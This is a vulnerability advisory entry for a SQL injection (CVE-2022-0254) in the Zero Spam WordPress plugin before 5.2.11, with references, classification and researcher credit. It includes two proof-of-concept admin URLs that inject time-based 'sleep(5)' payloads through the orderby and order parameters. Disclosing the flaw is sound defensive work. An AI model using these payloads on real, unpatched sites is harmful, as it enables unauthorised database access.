WordPress Plugin Vulnerabilities

Zero Spam < 5.2.11 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection

Proof of Concept

With at least one IP in the “Blocked IPs” list:

https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5)
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)

Affects Plugins

Plugin icon
zero-spam
Fixed in 5.2.11

References

CVE
CVE-2022-0254
URL
https://plugins.trac.wordpress.org/changeset/2660225
URL
https://plugins.trac.wordpress.org/changeset/2680906

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
ae54681f-7b89-408c-b0ee-ba4a520db997

Timeline

Publicly Published
2022-02-18 (about 1 years ago)
Added
2022-02-18 (about 1 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2022-04-28
Title
Hermit <= 3.1.6 - Subscriber+ SQLi
Published
2015-04-23
Title
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Published
2021-11-22
Title
ExportFeed <= 2.0.1.0 - Admin+ SQL Injection
Published
2021-09-21
Title
Game Server Status <= 1.0 - Admin+ Stored Cross-Site Scripting
Published
2016-05-20
Title
Huge IT Image Gallery < 1.9.0 - Unauthenticated SQL Injection